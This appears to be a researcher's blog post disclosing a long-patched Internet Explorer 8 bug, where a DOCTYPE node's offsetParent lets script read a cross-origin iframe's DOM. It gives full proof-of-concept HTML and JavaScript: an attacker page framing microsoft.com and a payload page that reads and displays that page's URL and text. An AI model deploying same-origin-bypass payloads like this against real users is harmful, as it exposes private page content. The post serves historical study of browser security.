I was lucky to find this one. A page with a !DOCTYPE declaration exposes document.all[0] as the DOCTYPE node, and that node’s offsetParent is the hosting iframe element — even when that iframe belongs to a cross-origin page. From the iframe element you can walk up to ownerDocument and read the entire cross-origin DOM.
<!-- offsetparent.html (served from attacker's domain, loaded into a hijacked cross-origin iframe) -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- DOCTYPE MUST BE PRESENT FOR THIS BUG TO WORK -->
<html>
<body>
<script>
alert("innerText of " + document.all[0].offsetParent.ownerDocument.URL + "\n\n" +
document.all[0].offsetParent.ownerDocument.body.innerText);
</script>
</body>
</html><!-- index.html (attacker's page) -->
<iframe src="http://www.microsoft.com/" width="400" height="100"
onload="load_offsetParent_html()"></iframe>
<script language="JavaScript">
function load_offsetParent_html()
{
// window[0] is microsoft.com; window[0][0] is the first iframe inside it
window[0][0].location = "offsetparent.html?001";
}
</script>The DOCTYPE node’s offsetParent is the <iframe> element that lives in the parent document — a document we have no business reading. Once inside offsetParent.ownerDocument, there are no same-origin restrictions. The DOCTYPE must be present; without it document.all[0] is a different element and the offsetParent reference points elsewhere.
Old Version (Did Not Work on Latest IE8)
An earlier variation used the same offsetparent.html payload but was broken by a later IE8 build. The updated version above was confirmed working on the release build.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.